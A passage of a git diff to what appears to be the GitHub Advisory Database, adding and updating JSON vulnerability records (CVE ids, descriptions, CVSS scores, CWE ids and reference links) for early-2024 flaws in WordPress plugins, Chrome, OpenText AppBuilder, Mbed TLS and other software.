"schema_version": "1.4.0", + "id": "GHSA-crc6-rq97-7rcx", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22162" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM Shortcodes allows Reflected XSS.This issue affects WPZOOM Shortcodes: from n/a through 1.0.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22162" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wpzoom-shortcodes/wordpress-wpzoom-shortcodes-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-crgw-m82j-jv5c/GHSA-crgw-m82j-jv5c.json b/advisories/unreviewed/2024/01/GHSA-crgw-m82j-jv5c/GHSA-crgw-m82j-jv5c.json new file mode 100644 index 0000000000000..1dbc98c93dd36 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-crgw-m82j-jv5c/GHSA-crgw-m82j-jv5c.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crgw-m82j-jv5c", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4550" + ], + "details": "Improper Input Validation, Files or Directories Accessible to External Parties vulnerability in OpenText AppBuilder on Windows, Linux allows Probe System Files.\n\nAn unauthenticated or authenticated user can abuse a page of AppBuilder to read arbitrary files on the server on which it is hosted. \n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4550" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20", + "CWE-552" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json b/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json index b2bdaca57ee92..6e9ed1ff9f251 100644 --- a/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json +++ b/advisories/unreviewed/2024/01/GHSA-crvx-w25m-8x7c/GHSA-crvx-w25m-8x7c.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json b/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json index ecfa2344c9d0e..935609a033104 100644 --- a/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json +++ b/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json b/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json index 8ee38e8849508..f3d9db162916e 100644 --- a/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json +++ b/advisories/unreviewed/2024/01/GHSA-cw47-8xqr-cfh2/GHSA-cw47-8xqr-cfh2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cw47-8xqr-cfh2", - "modified": "2024-01-12T03:30:49Z", + "modified": "2024-02-08T18:30:38Z", "published": "2024-01-12T03:30:49Z", "aliases": [ "CVE-2023-6040" @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2024/01/12/1" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/12/1" diff --git a/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json b/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json index a6623619666f4..867f664a6e439 100644 --- a/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json +++ b/advisories/unreviewed/2024/01/GHSA-cx8g-4cf5-cjv3/GHSA-cx8g-4cf5-cjv3.json @@ -40,7 +40,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json b/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json index e5b76a47321fa..fef61beb887e5 100644 --- a/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json +++ b/advisories/unreviewed/2024/01/GHSA-f282-55f7-242h/GHSA-f282-55f7-242h.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-f3p3-3pq5-xp8x/GHSA-f3p3-3pq5-xp8x.json b/advisories/unreviewed/2024/01/GHSA-f3p3-3pq5-xp8x/GHSA-f3p3-3pq5-xp8x.json new file mode 100644 index 0000000000000..16c6ad32a1784 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-f3p3-3pq5-xp8x/GHSA-f3p3-3pq5-xp8x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3p3-3pq5-xp8x", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24135" + ], + "details": "Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24135" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/2024_Product_Inventory_with_Export_to_Excel_XSS/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-f44w-wxhf-f354/GHSA-f44w-wxhf-f354.json b/advisories/unreviewed/2024/01/GHSA-f44w-wxhf-f354/GHSA-f44w-wxhf-f354.json new file mode 100644 index 0000000000000..3bedcd2b3fc02 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-f44w-wxhf-f354/GHSA-f44w-wxhf-f354.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f44w-wxhf-f354", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7199" + ], + "details": "The Relevanssi WordPress plugin before 4.22.0, Relevanssi Premium WordPress plugin before 2.25.0 allows any unauthenticated user to read draft and private posts via a crafted request", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7199" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/0c96a128-4473-41f5-82ce-94bba33ca4a3/" + }, + { + "type": "WEB", + "url": "https://www.relevanssi.com/release-notes/premium-2-25-free-4-22-release-notes/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json b/advisories/unreviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json deleted file mode 100644 index caaf8e9764af0..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-f4qf-m5gf-8jm8/GHSA-f4qf-m5gf-8jm8.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-f4qf-m5gf-8jm8", - "modified": "2024-01-26T15:30:26Z", - "published": "2024-01-19T12:30:18Z", - "aliases": [ - "CVE-2024-21733" - ], - "details": "Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.\n\n", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21733" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2024/01/19/2" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-209" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-19T11:15:08Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json b/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json index f417a5fe7e62b..30f34b834126a 100644 --- a/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json +++ b/advisories/unreviewed/2024/01/GHSA-f63q-6c68-mrcx/GHSA-f63q-6c68-mrcx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f63q-6c68-mrcx", - "modified": "2024-01-16T18:31:11Z", + "modified": "2024-01-30T15:30:20Z", "published": "2024-01-16T18:31:11Z", "aliases": [ "CVE-2024-23347" ], "details": "Prior to v176, when opening a new project Meta Spark Studio would execute scripts defined inside of a package.json file included as part of that project. Those scripts would have the ability to execute arbitrary code on the system as the application.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-16T18:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json b/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json index 3f0e53217f572..c0c4aafb6a528 100644 --- a/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json +++ b/advisories/unreviewed/2024/01/GHSA-f7x7-cw3q-5rm9/GHSA-f7x7-cw3q-5rm9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f7x7-cw3q-5rm9", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0806" ], "details": "Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json b/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json index a05bb1c2d9096..df54c24a5294d 100644 --- a/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json +++ b/advisories/unreviewed/2024/01/GHSA-f8vm-23j7-pf2r/GHSA-f8vm-23j7-pf2r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f8vm-23j7-pf2r", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23218" ], "details": "A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -53,9 +56,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-203" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json b/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json index a556d45e77e97..023d78dea7b65 100644 --- a/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json +++ b/advisories/unreviewed/2024/01/GHSA-f8xf-39w2-mrc6/GHSA-f8xf-39w2-mrc6.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json b/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json index f8769f45489cc..f0a1c08f7cc88 100644 --- a/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json +++ b/advisories/unreviewed/2024/01/GHSA-f96h-7c9x-735r/GHSA-f96h-7c9x-735r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f96h-7c9x-735r", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47193" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47194.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-f9w7-q39f-hcvh/GHSA-f9w7-q39f-hcvh.json b/advisories/unreviewed/2024/01/GHSA-f9w7-q39f-hcvh/GHSA-f9w7-q39f-hcvh.json new file mode 100644 index 0000000000000..4618311c7fbb4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-f9w7-q39f-hcvh/GHSA-f9w7-q39f-hcvh.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f9w7-q39f-hcvh", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-1017" + ], + "details": "A vulnerability was found in Gabriels FTP Server 1.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument USERNAME leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252287.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1017" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252287" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252287" + }, + { + "type": "WEB", + "url": "https://www.youtube.com/watch?v=wwHuXfYS8yQ" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json b/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json index 1de61f25eaca5..0addd5d75f592 100644 --- a/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json +++ b/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json @@ -56,6 +56,46 @@ { "type": "WEB", "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1035" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/10" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/4" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/5" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/9" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/03/1" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json b/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json index 5c86a681ddd6f..0a306319f630a 100644 --- a/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json +++ b/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fg7j-3vp4-4qpg", - "modified": "2024-01-24T03:31:25Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T03:31:25Z", "aliases": [ "CVE-2024-22380" ], "details": "Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-611" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T02:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-fgff-579x-65fj/GHSA-fgff-579x-65fj.json b/advisories/unreviewed/2024/01/GHSA-fgff-579x-65fj/GHSA-fgff-579x-65fj.json new file mode 100644 index 0000000000000..df24d9dec17cf --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-fgff-579x-65fj/GHSA-fgff-579x-65fj.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fgff-579x-65fj", + "modified": "2024-01-31T09:30:18Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2024-23775" + ], + "details": "Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension().", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23775" + }, + { + "type": "WEB", + "url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-2/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T08:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-fgx5-x337-5fv2/GHSA-fgx5-x337-5fv2.json b/advisories/unreviewed/2024/01/GHSA-fgx5-x337-5fv2/GHSA-fgx5-x337-5fv2.json new file mode 100644 index 0000000000000..f9558a7920d67 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-fgx5-x337-5fv2/GHSA-fgx5-x337-5fv2.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fgx5-x337-5fv2", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-1034" + ], + "details": "A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadFile of the file /application/index/controller/File.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252309 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1034" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/ABYkFE4wRPW5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252309" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252309" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json b/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json index 1fa9788ac567a..6d84bfa2b2927 100644 --- a/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json +++ b/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-fhq6-2w37-vh8q/GHSA-fhq6-2w37-vh8q.json b/advisories/unreviewed/2024/01/GHSA-fhq6-2w37-vh8q/GHSA-fhq6-2w37-vh8q.json new file mode 100644 index 0000000000000..afd6742c74a63 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-fhq6-2w37-vh8q/GHSA-fhq6-2w37-vh8q.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhq6-2w37-vh8q", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T00:30:18Z", + "aliases": [ + "CVE-2024-1060" + ], + "details": "Use after free in Canvas in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1060" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html" + }, + { + "type": "WEB", + "url": "https://crbug.com/1511567" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-fjv8-rf2g-h37h/GHSA-fjv8-rf2g-h37h.json b/advisories/unreviewed/2024/01/GHSA-fjv8-rf2g-h37h/GHSA-fjv8-rf2g-h37h.json new file mode 100644 index 0000000000000..7c5e900e3b51f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-fjv8-rf2g-h37h/GHSA-fjv8-rf2g-h37h.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjv8-rf2g-h37h", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2024-0836" + ], + "details": "The WordPress Review & Structure Data Schema Plugin – Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0836" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T08:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-fp4h-ppqj-prv5/GHSA-fp4h-ppqj-prv5.json b/advisories/unreviewed/2024/01/GHSA-fp4h-ppqj-prv5/GHSA-fp4h-ppqj-prv5.json new file mode 100644 index 0000000000000..90df1f76dbdab --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-fp4h-ppqj-prv5/GHSA-fp4h-ppqj-prv5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fp4h-ppqj-prv5", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-1014" + ], + "details": "Uncontrolled resource consumption vulnerability 